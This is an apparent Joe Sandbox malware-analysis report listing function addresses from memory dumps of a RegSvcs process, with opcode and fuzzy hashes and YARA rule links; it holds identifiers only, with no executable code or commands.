                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: PH^q
                                                                                                          • API String ID: 0-2549759414
                                                                                                          • Opcode ID: ab25b3633ae119b4928af086ac623ed7f20d2f018c2801f0c0b25e893d48dd0e
                                                                                                          • Instruction ID: bcc3dc5a59dad8996f18e2e1e1653a30e4c48a10a3052bcbef65a679c7c6a18e
                                                                                                          • Opcode Fuzzy Hash: ab25b3633ae119b4928af086ac623ed7f20d2f018c2801f0c0b25e893d48dd0e
                                                                                                          • Instruction Fuzzy Hash: 26418F70E006099FDF65EFB5D45469EBBF2BF85200F20452AE405EB245DBB0E986CBA1
                                                                                                          Function 06A92267 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: PH^q
                                                                                                          • API String ID: 0-2549759414
                                                                                                          • Opcode ID: e8f6eee47a15bd50f629a2c8b7a7c04233123804e74113105b4a7b256f13f84c
                                                                                                          • Instruction ID: 46bf5df72e5c1c1ee89ce91a95c7eebc2cea55c62645ef2dcf7b86501e790d0d
                                                                                                          • Opcode Fuzzy Hash: e8f6eee47a15bd50f629a2c8b7a7c04233123804e74113105b4a7b256f13f84c
                                                                                                          • Instruction Fuzzy Hash: 5C31ED70B102019FDB95AF74D55426FBBE2AB89600F208568E406DF395EE75CE02CBA1
                                                                                                          Function 06A92278 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: PH^q
                                                                                                          • API String ID: 0-2549759414
                                                                                                          • Opcode ID: bc6318700c1c3691461629189bc319ee8a721bee3a1f96b1ba4f0e2565302591
                                                                                                          • Instruction ID: ab892afc25ec4d7bf9c54ea7a194b76c707925c0bac8ad5fa515de61ae8a8ec4
                                                                                                          • Opcode Fuzzy Hash: bc6318700c1c3691461629189bc319ee8a721bee3a1f96b1ba4f0e2565302591
                                                                                                          • Instruction Fuzzy Hash: D4310F70B102059FDF99AB74D45436FBBE3AB89600F208528D406DF398EE75DD02CBA2
                                                                                                          Function 06A923F0 Relevance: 1.0, Instructions: 996COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 54a94c0bcdd4727078710ff3001010d6ca74b7bbbe0cadb7286a1ef53cde8982
                                                                                                          • Instruction ID: 629d1e90db7b2e63d92031c46cd234772d70e458d1a9ffda33fe7938bac7092e
                                                                                                          • Opcode Fuzzy Hash: 54a94c0bcdd4727078710ff3001010d6ca74b7bbbe0cadb7286a1ef53cde8982
                                                                                                          • Instruction Fuzzy Hash: 68925634A102049FDF64EB68C584B6DB7F2FB45314F2484A9D40AAF365DB35ED86CBA0
                                                                                                          Function 06A9C1F0 Relevance: .6, Instructions: 639COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0d5c87120392e64d61642b754e10a9b794bcf46f60169ceeb32e39b2cad39d45
                                                                                                          • Instruction ID: 6c69e25afabb56d9c8fd844d977145129c4161ede36957d77a563d15c97d933e
                                                                                                          • Opcode Fuzzy Hash: 0d5c87120392e64d61642b754e10a9b794bcf46f60169ceeb32e39b2cad39d45
                                                                                                          • Instruction Fuzzy Hash: 1E328434B006099FDF54EB68D590AAEB7F2FB88310F208525D506EB355DB35EC46CBA1
                                                                                                          Function 06A96DA0 Relevance: .3, Instructions: 257COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4b4b0fa862a09a9a2f9282689559a81f7c875878c8fc431ee34d5d12803976c5
                                                                                                          • Instruction ID: 0a56ae3e9e34bcce8ff403b60a84206bf5b84cd2bb836d18b46c0f03fa409b5e
                                                                                                          • Opcode Fuzzy Hash: 4b4b0fa862a09a9a2f9282689559a81f7c875878c8fc431ee34d5d12803976c5
                                                                                                          • Instruction Fuzzy Hash: C4A16930A102048FDF64EB69D594A5EB7F2FF84314F648469E41AAB355DB32EC46CBA0
                                                                                                          Function 06A96268 Relevance: .2, Instructions: 229COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d9311b72b4185a79fa4358d32c3fe0bbb1ed034b9e42b0666637a122b58aaac7
                                                                                                          • Instruction ID: e624b384b6b85376b62823246e9c761054fd196283db7c593d084e23fef1ef90
                                                                                                          • Opcode Fuzzy Hash: d9311b72b4185a79fa4358d32c3fe0bbb1ed034b9e42b0666637a122b58aaac7
                                                                                                          • Instruction Fuzzy Hash: 9D61BC71F000214FDF54AB7AC89466FAADBAFC4620B25447AD80EDB364DEB5DD0287D2
                                                                                                          Function 06A94311 Relevance: .2, Instructions: 222COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d04931a257545b691009fbe34fa5b1ee805fb3301270044f27c42f15442196b7
                                                                                                          • Instruction ID: 2444004c013caf168ab75ebf50e9e575a9eb1fdb49769a72cc714284be655f2f
                                                                                                          • Opcode Fuzzy Hash: d04931a257545b691009fbe34fa5b1ee805fb3301270044f27c42f15442196b7
                                                                                                          • Instruction Fuzzy Hash: A9813C31B002099FDF54EFA9D49466EB7F2EF89304F208429D50ADB394EA30DC478B51
                                                                                                          Function 06A94634 Relevance: .2, Instructions: 217COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d1a305e9d484e61cde4f7b337a31e8b9b3c1065843acdef595a1d658310bdcaa
                                                                                                          • Instruction ID: 5271e89ab261810a8c7081baaf995b425ed129e5be3d98c9b9354400d220f6df
                                                                                                          • Opcode Fuzzy Hash: d1a305e9d484e61cde4f7b337a31e8b9b3c1065843acdef595a1d658310bdcaa
                                                                                                          • Instruction Fuzzy Hash: 38913E34E1021A8FDF64DF68C890B9DB7B1FF89300F208599D549AB355DB70AA86CF91
                                                                                                          Function 06A94648 Relevance: .2, Instructions: 210COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8f5f91c78dbc822eabd8840212613026f4dd7d27a7e45c27e0e3994a76b3798b
                                                                                                          • Instruction ID: 5a687c9d31d4b80ba0080bb8a4661b75b3bdb9461a8138177d096cd074db3c39
                                                                                                          • Opcode Fuzzy Hash: 8f5f91c78dbc822eabd8840212613026f4dd7d27a7e45c27e0e3994a76b3798b
                                                                                                          • Instruction Fuzzy Hash: 9B913F34E1021A8BDF64DF68C880B9DB7B1FF89300F20C599D549AB354DB70A986CF91
                                                                                                          Function 06A9EB80 Relevance: .2, Instructions: 203COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a110bda4a2156902ab9d61ca0f32907ff1459ccec761eb4141799e174af8b811
                                                                                                          • Instruction ID: 43ad731f80c03e0c4dfbc9e0f149b493f87256e4ebfd9756cdde9894086e1e1d
                                                                                                          • Opcode Fuzzy Hash: a110bda4a2156902ab9d61ca0f32907ff1459ccec761eb4141799e174af8b811
                                                                                                          • Instruction Fuzzy Hash: 78710970A002199FDF54EFA9D990A9EBBF6FF88300F248569D405EB355DB30E846CB50
                                                                                                          Function 06A9EB90 Relevance: .2, Instructions: 201COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 96634ed429a7f68c792edc46ffb79a7269ca6949dcc8732ed57afded34ff9b52
                                                                                                          • Instruction ID: 4a2b2ffd9de9f8768a6134a93536d37a03dc833f6d8f747f555a1f776bee7536
                                                                                                          • Opcode Fuzzy Hash: 96634ed429a7f68c792edc46ffb79a7269ca6949dcc8732ed57afded34ff9b52
                                                                                                          • Instruction Fuzzy Hash: A9710A71A002199FDF54EFA9D990A9EBBF6FF88300F248469D405EB365DB30E946CB50
                                                                                                          Function 06A9FCF1 Relevance: .2, Instructions: 176COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a00133d65f5be2a95742e415d20a6ac8bd83068d33e341f3bb56714d89e29f98
                                                                                                          • Instruction ID: 4ff92373df3675892fee8406b0297d16a72cef4de1c521c48636dfccfb1a0347
                                                                                                          • Opcode Fuzzy Hash: a00133d65f5be2a95742e415d20a6ac8bd83068d33e341f3bb56714d89e29f98
                                                                                                          • Instruction Fuzzy Hash: 3151F031A01205DFDF64FBB8E4442ADBBF2FB85315F208869E11ADB251DB318846CBA0
                                                                                                          Function 06A9FAA0 Relevance: .2, Instructions: 168COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b30ef349c0652d476fd37638f8e3e5f2dd761b47af75571f7bf6da6096abd0f4
                                                                                                          • Instruction ID: d7830265a8c28ce9003db54feeca593fd554461d7fb5ee656fb121732be66777
                                                                                                          • Opcode Fuzzy Hash: b30ef349c0652d476fd37638f8e3e5f2dd761b47af75571f7bf6da6096abd0f4
                                                                                                          • Instruction Fuzzy Hash: 3B51CB30B11314DFEF647B6CD96476F36AED789310F30482AD50ADB3A9CA69CC4587A2
                                                                                                          Function 06A9FAB0 Relevance: .2, Instructions: 163COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 61d4f2410f41ad1af88fce3c6a98868b9ce2b1498abc62be1172960840561d3f
                                                                                                          • Instruction ID: af24aa90ead33041db69bff1345ff0fa745f67f43dc1a86f00a82d45f28fd8e2
                                                                                                          • Opcode Fuzzy Hash: 61d4f2410f41ad1af88fce3c6a98868b9ce2b1498abc62be1172960840561d3f
                                                                                                          • Instruction Fuzzy Hash: 9951BA30B10318DFEF647B6CD9A472F369ED789310F30482AD50ADB799CA69DC4547A2
                                                                                                          Function 06A95488 Relevance: .1, Instructions: 130COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a8bec318004b6a3d196cbdd41630c164242c6f20a854b222fdee752053cbfa5d
                                                                                                          • Instruction ID: 62ab29616e8391d9a04b1b74d8fcba66d26b8e6701a7b517dc9fdc3a27b71819
                                                                                                          • Opcode Fuzzy Hash: a8bec318004b6a3d196cbdd41630c164242c6f20a854b222fdee752053cbfa5d
                                                                                                          • Instruction Fuzzy Hash: 59417C71E006098FDF61DFA9C9C1AAFF7F2EB84310F20492AD116DB251D330E8558BA1
                                                                                                          Function 06A92128 Relevance: .1, Instructions: 99COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: dd3974b679ba785bf7fd0a19138d3c7cb04d560c6082e31bcd88f55a3a64ad5a
                                                                                                          • Instruction ID: eac9a93592b83b884077df0c28e3d873ab024761d91132b6dcba19a5c7fca93d
                                                                                                          • Opcode Fuzzy Hash: dd3974b679ba785bf7fd0a19138d3c7cb04d560c6082e31bcd88f55a3a64ad5a
                                                                                                          • Instruction Fuzzy Hash: FD314F34E202069FDB59DFA4D45469EB7F2BF89300F20C519E906AB750DB719D46CB50
                                                                                                          Function 06A92138 Relevance: .1, Instructions: 91COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ef1297996d5f7666b262626d977d7aaf61cd31ed3d4916ff0d54961787dafd61
                                                                                                          • Instruction ID: 2c37aab2a30261b4c95bbdbb97722810f535b8a25d5db8f886def7a608283072
                                                                                                          • Opcode Fuzzy Hash: ef1297996d5f7666b262626d977d7aaf61cd31ed3d4916ff0d54961787dafd61
                                                                                                          • Instruction Fuzzy Hash: 92315034E202069BDF59EFA5D85469EB7F2BF89300F208519E906EB350DB71AD46CB60
                                                                                                          Function 06A93B10 Relevance: .1, Instructions: 83COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e9d237681c2ef48c171c8d33b48e9e95e31e5d8f9cb4bc8ca75d79d6dc6f19e1
                                                                                                          • Instruction ID: b55bc27f2f7044b4135a282f0f8a630961db20360a284087c1c699c05f03b79b
                                                                                                          • Opcode Fuzzy Hash: e9d237681c2ef48c171c8d33b48e9e95e31e5d8f9cb4bc8ca75d79d6dc6f19e1
                                                                                                          • Instruction Fuzzy Hash: 2D217FB5F006199FDF50EFB9D890AAEBBF5EB48710F108065E905EB384E734D8418BA5
                                                                                                          Function 06A93B20 Relevance: .1, Instructions: 78COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 145d24c792bdd4c98e96a041b6d785fa20c1c65c6b94dc8d285ef1d1321c8021
                                                                                                          • Instruction ID: 1b30739b87a119264aaeda9660dc217f9441242ab3f439d6d882719421e2ff1e
                                                                                                          • Opcode Fuzzy Hash: 145d24c792bdd4c98e96a041b6d785fa20c1c65c6b94dc8d285ef1d1321c8021
                                                                                                          • Instruction Fuzzy Hash: 0021AEB5F006199FDF40EFA9D890AAEB7F1EB48710F208025E905EB384E730DC018BA1
                                                                                                          Function 06A96D89 Relevance: .1, Instructions: 75COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ef34b295a0fbac9560a87ecf895f8b7a2f3839812ef240ec79467e98b6ccab9d
                                                                                                          • Instruction ID: 6749bcace2a0aa5374b9b4cd9e46cc1e4009864967f50825e158412babc1d2f9
                                                                                                          • Opcode Fuzzy Hash: ef34b295a0fbac9560a87ecf895f8b7a2f3839812ef240ec79467e98b6ccab9d
                                                                                                          • Instruction Fuzzy Hash: 5C21B031B102099FDF94EB68E8906AEB7F6EF85310F24852AE405DB344D731EC51CB95
                                                                                                          Function 06A93C30 Relevance: .1, Instructions: 59COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ff358d2075991a8487d10bb0cf79488915c46765db3cb822fd3f3e0bbb14c3cb
                                                                                                          • Instruction ID: e83190571da3ee16aa3dc90128cb2ecb04c1847c9429e7ddba4ef202fba25726
                                                                                                          • Opcode Fuzzy Hash: ff358d2075991a8487d10bb0cf79488915c46765db3cb822fd3f3e0bbb14c3cb
                                                                                                          • Instruction Fuzzy Hash: 0211A535B145285FDF54AA68D854AAF73FAABC8311F104535D40AE7344EE25EC0687A1
                                                                                                          Function 06A94270 Relevance: .1, Instructions: 55COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 62ffebae9b015a10dbf05428580763243bd95008c307e7fa22b7b8f22e351511
                                                                                                          • Instruction ID: b5cce5ac5cd4bed81840125d57d4a57a49078acf383827993d071bdb062b50be
                                                                                                          • Opcode Fuzzy Hash: 62ffebae9b015a10dbf05428580763243bd95008c307e7fa22b7b8f22e351511
                                                                                                          • Instruction Fuzzy Hash: 9401B132B006104FDBA5AABDA41072BB7DAEBCE710F24887EE10ACF395D961DC024795
                                                                                                          Function 06A93C20 Relevance: .1, Instructions: 54COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4222f695be139a06123e90b3a307a5077f9e6e4150aa84b6d226feb37743e0a1
                                                                                                          • Instruction ID: f08f7340dcddf75689d327c9ad3fb5bd07326bb12a04341feefa1f27706997e4
                                                                                                          • Opcode Fuzzy Hash: 4222f695be139a06123e90b3a307a5077f9e6e4150aa84b6d226feb37743e0a1
                                                                                                          • Instruction Fuzzy Hash: 9E017536B140285BDF54EA79DC54AEB77FAABC8711F104036E51AD7244EF21AC0687E2
                                                                                                          Function 06A9EE01 Relevance: .1, Instructions: 53COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 42af497d5084de284a9d14ca6051fa30407e40042c6d6246f5085582c3217b00
                                                                                                          • Instruction ID: e496c442f6e000698eb8ddeae7ca2fac752562db07d32184192647d8a0854e29
                                                                                                          • Opcode Fuzzy Hash: 42af497d5084de284a9d14ca6051fa30407e40042c6d6246f5085582c3217b00
                                                                                                          • Instruction Fuzzy Hash: 49017135B001116FDB65E76DA45072A76D6FBCA610F24842AE50ACF342D925EC0347A6
                                                                                                          Function 06A9A380 Relevance: .1, Instructions: 53COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 326a567d95d6508b5307575f07c0f934281a49bff1b9e0233e61e0852e1c58f8
                                                                                                          • Instruction ID: 93c20f1befcfdb6662ef411fdef55bb0535a5f8158d1966112b7dbd75faa00e2
                                                                                                          • Opcode Fuzzy Hash: 326a567d95d6508b5307575f07c0f934281a49bff1b9e0233e61e0852e1c58f8
                                                                                                          • Instruction Fuzzy Hash: B501D8357001144FDB51E77CE8A075B73D6FBC9714F204829F60ACB354DA21EC4287A5
                                                                                                          Function 06A938E8 Relevance: .1, Instructions: 52COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c03283af86a252c7e3c6ab14c7e721e013620a23a0210384e73869ea40d71f19
                                                                                                          • Instruction ID: 6161f7be6bf182eb39bc2e3206d336a0336bb0d8f054b6db5b6e7a8428501805
                                                                                                          • Opcode Fuzzy Hash: c03283af86a252c7e3c6ab14c7e721e013620a23a0210384e73869ea40d71f19
                                                                                                          • Instruction Fuzzy Hash: 5D21FFB5D01259AFCB00DF9AD884ADEFFB4BB49310F20812AE918B7201C374A944CFA4
                                                                                                          Function 06A938F0 Relevance: .1, Instructions: 52COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 386815738519b8da3b3a72265b4af106d040f190f7cca66dc8bc2f2a55fe3975
                                                                                                          • Instruction ID: 331225922ec75090338ffbe9a4bb8308767e11bf20ca6cded643cfa0413d0f90
                                                                                                          • Opcode Fuzzy Hash: 386815738519b8da3b3a72265b4af106d040f190f7cca66dc8bc2f2a55fe3975
                                                                                                          • Instruction Fuzzy Hash: 9111C2B5D01219AFCB00DF9AD884ADEFBB4FB48314F10812AE518A7240C374A944CFA5
                                                                                                          Function 06A94280 Relevance: .1, Instructions: 51COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8ded221f079d16985f3829a27298f444ecd15fb10efa96c674babe3cea36032b
                                                                                                          • Instruction ID: 6c3a5a571df7e036f7edff53a8cddd7bfb7af493db619c5981073c2b9deeaaf6
                                                                                                          • Opcode Fuzzy Hash: 8ded221f079d16985f3829a27298f444ecd15fb10efa96c674babe3cea36032b
                                                                                                          • Instruction Fuzzy Hash: 6E014B32B005101BDB64AABEA45472BB6DAEBCD620F24883EE10ACF784D961DC4243A5
                                                                                                          Function 06A9EE10 Relevance: .0, Instructions: 49COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.1812857969.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_6a90000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 841cf5adb558943fa758e6b02c296189ce354904af703a9142cae63234101b66
